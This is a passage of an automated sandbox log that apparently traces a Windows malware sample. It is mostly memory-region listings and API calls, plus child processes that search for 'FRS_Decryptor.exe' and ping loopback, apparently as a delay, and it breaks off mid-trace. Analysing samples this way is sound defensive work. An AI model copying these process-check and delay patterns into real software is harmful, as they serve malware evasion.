end_va = 0x745f8fff entry_point = 0x745f0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 3451 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3452 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3453 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3454 start_va = 0x74bc0000 end_va = 0x74d0dfff entry_point = 0x74bc0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3455 start_va = 0x74d10000 end_va = 0x74d87fff entry_point = 0x74d10000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3456 start_va = 0x74d90000 end_va = 0x74e16fff entry_point = 0x74d90000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 3457 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3458 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 3459 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3460 start_va = 0x75360000 end_va = 0x75456fff entry_point = 0x75360000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3461 start_va = 0x75460000 end_va = 0x755aefff entry_point = 0x75460000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3462 start_va = 0x75700000 end_va = 0x7577cfff entry_point = 0x75700000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 3463 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3464 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3465 start_va = 0x76c50000 end_va = 0x76d5bfff entry_point = 0x76c50000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 3466 start_va = 0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 3467 start_va = 0x76d70000 end_va = 0x76db0fff entry_point = 0x76d70000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 3468 start_va = 0x76dc0000 end_va = 0x76de4fff entry_point = 0x76dc0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3469 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3470 start_va = 0x76ec0000 end_va = 0x76fc7fff entry_point = 0x76ec0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3471 start_va = 0x7e4c0000 end_va = 0x7e5bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e4c0000" filename = "" Region: id = 3472 start_va = 0x73430000 end_va = 0x73471fff entry_point = 0x73430000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 3473 start_va = 0x500000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 3474 start_va = 0x570000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3475 start_va = 0x5b0000 end_va = 0x5effff entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 3476 start_va = 0x5f0000 end_va = 0x62ffff entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 3477 start_va = 0x630000 end_va = 0x66ffff entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 3478 start_va = 0x26f0000 end_va = 0x272ffff entry_point = 0x0 region_type = private name = "private_0x00000000026f0000" filename = "" Region: id = 3479 start_va = 0x73420000 end_va = 0x7342ffff entry_point = 0x73420000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 3480 start_va = 0x73f20000 end_va = 0x73f3cfff entry_point = 0x73f20000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 3481 start_va = 0x73f40000 end_va = 0x73f6efff entry_point = 0x73f40000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 3482 start_va = 0x73f70000 end_va = 0x73f87fff entry_point = 0x73f70000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 3483 start_va = 0x7e4bd000 end_va = 0x7e4bffff entry_point = 0x0 region_type = private name = "private_0x000000007e4bd000" filename = "" Region: id = 3484 start_va = 0x7e5e3000 end_va = 0x7e5e5fff entry_point = 0x0 region_type = private name = "private_0x000000007e5e3000" filename = "" Region: id = 3485 start_va = 0x7e5ea000 end_va = 0x7e5ecfff entry_point = 0x0 region_type = private name = "private_0x000000007e5ea000" filename = "" Region: id = 3486 start_va = 0x73370000 end_va = 0x7341afff entry_point = 0x73370000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 3487 start_va = 0x73350000 end_va = 0x7336afff entry_point = 0x73350000 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\SysWOW64\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wmiutils.dll") Thread: id = 200 os_tid = 0xb98 Thread: id = 202 os_tid = 0xbc0 Thread: id = 203 os_tid = 0xbc8 Thread: id = 204 os_tid = 0xbc4 Process: id = "64" image_name = "find.exe" filename = "c:\\windows\\syswow64\\find.exe" page_root = "0x22073000" os_pid = "0xba4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "62" os_parent_pid = "0xb94" cmd_line = "find /i \"FRS_Decryptor.exe\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3395 start_va = 0x880000 end_va = 0x89ffff entry_point = 0x0 region_type = private name = "private_0x0000000000880000" filename = "" Region: id = 3396 start_va = 0x8a0000 end_va = 0x8a1fff entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 3397 start_va = 0x8b0000 end_va = 0x8befff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008b0000" filename = "" Region: id = 3398 start_va = 0x8c0000 end_va = 0x8fffff entry_point = 0x0 region_type = private name = "private_0x00000000008c0000" filename = "" Region: id = 3399 start_va = 0x900000 end_va = 0x93ffff entry_point = 0x0 region_type = private name = "private_0x0000000000900000" filename = "" Region: id = 3400 start_va = 0x940000 end_va = 0x943fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000940000" filename = "" Region: id = 3401 start_va = 0x950000 end_va = 0x950fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000950000" filename = "" Region: id = 3402 start_va = 0x960000 end_va = 0x961fff entry_point = 0x0 region_type = private name = "private_0x0000000000960000" filename = "" Region: id = 3403 start_va = 0x11c0000 end_va = 0x11c6fff entry_point = 0x11c0000 region_type = mapped_file name = "find.exe" filename = "\\Windows\\SysWOW64\\find.exe" (normalized: "c:\\windows\\syswow64\\find.exe") Region: id = 3404 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3405 start_va = 0x7f170000 end_va = 0x7f192fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f170000" filename = "" Region: id = 3406 start_va = 0x7f194000 end_va = 0x7f194fff entry_point = 0x0 region_type = private name = "private_0x000000007f194000" filename = "" Region: id = 3407 start_va = 0x7f19a000 end_va = 0x7f19cfff entry_point = 0x0 region_type = private name = "private_0x000000007f19a000" filename = "" Region: id = 3408 start_va = 0x7f19d000 end_va = 0x7f19dfff entry_point = 0x0 region_type = private name = "private_0x000000007f19d000" filename = "" Region: id = 3409 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3410 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3411 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3412 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 3417 start_va = 0xb60000 end_va = 0xb6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b60000" filename = "" Region: id = 3418 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3419 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3420 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3488 start_va = 0x880000 end_va = 0x88ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 3489 start_va = 0x890000 end_va = 0x893fff entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 3490 start_va = 0x8a0000 end_va = 0x8a3fff entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 3491 start_va = 0x970000 end_va = 0x9edfff entry_point = 0x970000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3492 start_va = 0xa60000 end_va = 0xa6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a60000" filename = "" Region: id = 3493 start_va = 0xd60000 end_va = 0xe5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d60000" filename = "" Region: id = 3494 start_va = 0x73340000 end_va = 0x7334efff entry_point = 0x73340000 region_type = mapped_file name = "fsutilext.dll" filename = "\\Windows\\SysWOW64\\fsutilext.dll" (normalized: "c:\\windows\\syswow64\\fsutilext.dll") Region: id = 3495 start_va = 0x73500000 end_va = 0x73520fff entry_point = 0x73500000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\SysWOW64\\ulib.dll" (normalized: "c:\\windows\\syswow64\\ulib.dll") Region: id = 3496 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3497 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3498 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3499 start_va = 0x7f070000 end_va = 0x7f16ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f070000" filename = "" Thread: id = 201 os_tid = 0xba0 Process: id = "65" image_name = "ping.exe" filename = "c:\\windows\\syswow64\\ping.exe" page_root = "0x225a9000" os_pid = "0xbd4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "ping -n 3 127.1" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3500 start_va = 0x650000 end_va = 0x66ffff entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 3501 start_va = 0x670000 end_va = 0x671fff entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 3502 start_va = 0x680000 end_va = 0x68efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 3503 start_va = 0x690000 end_va = 0x6cffff entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 3504 start_va = 0x6d0000 end_va = 0x70ffff entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 3505 start_va = 0x710000 end_va = 0x713fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000710000" filename = "" Region: id = 3506 start_va = 0x720000 end_va = 0x720fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000720000" filename = "" Region: id = 3507 start_va = 0x730000 end_va = 0x731fff entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 3508 start_va = 0x940000 end_va = 0x948fff entry_point = 0x940000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\SysWOW64\\PING.EXE" (normalized: "c:\\windows\\syswow64\\ping.exe") Region: id = 3509 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3510 start_va = 0x7ed00000 end_va = 0x7ed22fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ed00000" filename = "" Region: id = 3511 start_va = 0x7ed2a000 end_va = 0x7ed2afff entry_point = 0x0 region_type = private name = "private_0x000000007ed2a000" filename = "" Region: id = 3512 start_va = 0x7ed2c000 end_va = 0x7ed2cfff entry_point = 0x0 region_type = private name = "private_0x000000007ed2c000" filename = "" Region: id = 3513 start_va = 0x7ed2d000 end_va = 0x7ed2ffff entry_point = 0x0 region_type = private name = "private_0x000000007ed2d000" filename = "" Region: id = 3514 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3515 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3516 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3517 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 3518 start_va = 0x7c0000 end_va = 0x7cffff entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 3519 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3520 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3521 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3522 start_va = 0x650000 end_va = 0x65ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 3523 start_va = 0x660000 end_va = 0x663fff entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 3524 start_va = 0x740000 end_va = 0x7bdfff entry_point = 0x740000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3525 start_va = 0xa60000 end_va = 0xb5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a60000" filename = "" Region: id = 3526 start_va = 0xd10000 end_va = 0xd1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d10000" filename = "" Region: id = 3527 start_va = 0x73db0000 end_va = 0x73db7fff entry_point = 0x73db0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 3528 start_va = 0x73dc0000 end_va = 0x73dddfff entry_point = 0x73dc0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 3529 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3530 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3531 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3532 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3533 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 3534 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3535 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3536 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3537 start_va = 0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 3538 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3539 start_va = 0x7ec00000 end_va = 0x7ecfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ec00000" filename = "" Region: id = 3540 start_va = 0x7d0000 end_va = 0x80ffff entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 3541 start_va = 0x810000 end_va = 0x84ffff entry_point = 0x0 region_type = private name = "private_0x0000000000810000" filename = "" Region: id = 3542 start_va = 0x7ed27000 end_va = 0x7ed29fff entry_point = 0x0 region_type = private name = "private_0x000000007ed27000" filename = "" Region: id = 3543 start_va = 0x73690000 end_va = 0x736d4fff entry_point = 0x73690000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 3544 start_va = 0x670000 end_va = 0x672fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 3545 start_va = 0x850000 end_va = 0x850fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000850000" filename = "" Region: id = 3546 start_va = 0x860000 end_va = 0x862fff entry_point = 0x860000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\ping.exe.mui") Region: id = 3547 start_va = 0x870000 end_va = 0x8affff entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 3548 start_va = 0x8b0000 end_va = 0x8effff entry_point = 0x0 region_type = private name = "private_0x00000000008b0000" filename = "" Region: id = 3549 start_va = 0x7ed24000 end_va = 0x7ed26fff entry_point = 0x0 region_type = private name = "private_0x000000007ed24000" filename = "" Thread: id = 205 os_tid = 0xbd0 [0081.208] GetModuleHandleA (lpModuleName=0x0) returned 0x940000 [0081.208] __set_app_type (_Type=0x1) [0081.208] __p__fmode () returned 0x76ea1768 [0081.208] __p__commode () returned 0x76ea176c [0081.208] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x943229) returned 0x0 [0081.209] __wgetmainargs (in: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0, _DoWildCard=0, _StartInfo=0x9440dc | out: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0) returned 0 [0081.209] SetThreadUILanguage (LangId=0x0) returned 0x409 [0081.210] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0081.210] _fileno (_File=0x76ea4c28) returned 1 [0081.210] _get_osfhandle (_FileHandle=1) returned 0x28 [0081.210] GetFileType (hFile=0x28) returned 0x2 [0081.210] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x70f050 | out: lpMode=0x70f050) returned 0 [0081.210] GetLastError () returned 0x6 [0081.210] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x70efb4, nSize=0x50 | out: lpBuffer="䤐¦") returned 0x0 [0081.210] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x945500 | out: lpWSAData=0x945500) returned 0 [0081.212] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0x70f06c | out: phkResult=0x70f06c*=0x88) returned 0x0 [0081.213] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0x70f060, lpData=0x70f068, lpcbData=0x70f064*=0x4 | out: lpType=0x70f060*=0x0, lpData=0x70f068*=0x0, lpcbData=0x70f064*=0x4) returned 0x2 [0081.213] RegCloseKey (hKey=0x88) returned 0x0 [0081.213] GetAddrInfoW (in: pNodeName="127.1", pServiceName=0x0, pHints=0x70f030*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x70f06c | out: ppResult=0x70f06c*=0xa6c4d0*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xa68970*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) returned 0 [0081.213] FreeAddrInfoW (pAddrInfo=0xa6c4d0*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xa68970*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) [0081.213] IcmpCreateFile () returned 0xa66bf0 [0081.215] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0xa6c3e0 [0081.215] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0xa75270 [0081.215] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0x70f168, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0081.217] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274b, dwLanguageId=0x0, lpBuffer=0x70f060, nSize=0x0, Arguments=0x70f05c | out: lpBuffer="竈§勤p┗\x94䰨盪❋") returned 0x14 [0081.217] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0081.217] _fileno (_File=0x76ea4c28) returned 1 [0081.217] _get_osfhandle (_FileHandle=1) returned 0x28 [0081.217] GetFileType (hFile=0x28) returned 0x2 [0081.218] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x70f024 | out: lpMode=0x70f024) returned 0 [0081.218] GetLastError () returned 0x6 [0081.218] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x70ef88, nSize=0x50 | out: lpBuffer="p❋") returned 0x0 [0081.218] _fileno (_File=0x76ea4c28) returned 1 [0081.218] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0081.218] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, 